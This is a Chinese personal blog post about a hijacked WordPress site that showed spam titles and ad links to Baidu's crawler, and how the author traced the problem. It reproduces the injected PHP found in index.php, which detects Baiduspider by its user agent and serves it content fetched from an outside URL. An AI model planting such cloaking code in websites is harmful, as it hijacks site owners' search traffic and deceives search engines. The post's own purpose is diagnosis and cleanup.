我的网站被黑了,关键词被劫持,总结一下是怎么解决的。

2021-09-24

1、发现被黑,网站被黑的症状

      两年前自己用wordpress搭了一个网站,平时没事写写文章玩玩。但是前些日子,突然发现网站的流量突然变小,site了一下百度收录,发现出了大问题,网站被黑了。大多数百度抓取收录的页面title和description被篡改,如下图,title标题被改成xx友情链接,描述description是一些广告网址。但是点进去以后,访问正常,页面显示正常,页面源代码也正常,丝毫没有被篡改的痕迹。但是,为什么百度爬虫会抓取到这些广告文字呢,这些文字哪里来的?

 

 

2、自己猜想了一下原因,页面和百度抓取收录显示不一致。查服务器日志方案不可行。

     网站实际页面和百度排虫收录显示不一致,网站源代码肯定被了,但怎么改的,改在哪里不知道,服务器里代码文件有几百个,一个个检查,一行行看源代码肯定不现实。首先想到了检查服务器日志。但是问题是不知道骇客哪天改的,所以只能调出了几个星期的服务器日志来检查。可是,检查日志也是庞大的工程,而且对此经验不足,也很费事,也不一定有结果。因此,只能又寻求新的办法。

 

3、找到了问题解决的关键路线,使用useragent-watch

     页面内容没变,但百度排虫抓取错了,问题肯定出在爬虫抓取身上。所以如果能看到排虫抓取的整个流程,或许会会找到答案。一番研究之后,找到了一个工具“user-agent-switcher”,可以模拟各种设备和搜索引擎排虫,chrome和火狐浏览器都有插件可以安装。chrome安装useragent-watch之后,添加百度爬虫useragent 设置:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)。如图。

其他搜索引擎useragent:http://hi.baidu.com/romicboy/item/afc8d8d217278d5bd63aae22

 

     设置完以后,切换到模拟百度爬虫状态,再次访问我的网站,这次果然现原形了,网站这次跳到了另一个网站页面,这个页面内容就是,我网站在百度上显示的那些广告信息,如下图。再把useragent切换回来,输入我的网站域名,这次访问一切正常。这次可以下结论了,问题是在useragent上。骇客肯定修改了网站的源代码,而且是在源代码里加了判断语句,如果是当前请求的useragent是搜索引器爬虫,就把排虫引到把广告页面,如果是其他的就正常执行的。

 

4、找到被修改的源代码

     虽然找到了问题原因,但是该怎么找到被修改的文件呢。不过,了解了wordpress源代码文件执行顺序流程,一切就很简单了,如下图,按照顺序一个个文件找很快就能找到。

 

 

       登录到ftp,按照文件首先找到了index.php文件,果然,运气不错,第一个文件就是被修改的。骇客在代码最开始就添加了如下图的代码。

 

5、解释下这段php代码的意思:

$file="http://www.XXXX.com/XXXX/X.htm";$referer=$_SERVER["HTTP_REFERER"];//来路的网址url$agent= strtolower($_SERVER["HTTP_USER_AGENT"]);//当前请求的内容转化成小写if(strstr($referer,"baidu")&&strstr($referer,"456"))//如果是从百度点到该页的{Header("Location: $url");//转到原来的正常url}if(ereg("http://www.baidu.com/search/spider.htm",$agent))//如果是百度排虫{				$content=file_get_contents($file);//转到之前定义的那个url页面		echo $content;	exit;}

 把这一段删了,就ok了。重新提交百度,让百度重新抓取,过了几天百度快照更新就好了。

 注:一开始文章里“骇客”是写的“黑客”,产生了一些争议。百度了一下两者的区别:

黑客一词,原指热心于计算机技术,水平高超的电脑专家,尤其是程序设计人员。 但到了今天,黑客一词已被用于泛指那些专门利用电脑搞破坏或恶作剧的家伙。很多人往往把黑客与骇客浑肴,其实他们存在着本质的不同,通俗上讲骇客是入是那些利用网络漏洞破坏网络的人。有些黑客逾越尺度,运用自己的知识去做出有损他人权益的事情,我们就称这种人为骇客。



本网站由阿里云提供云计算及安全服务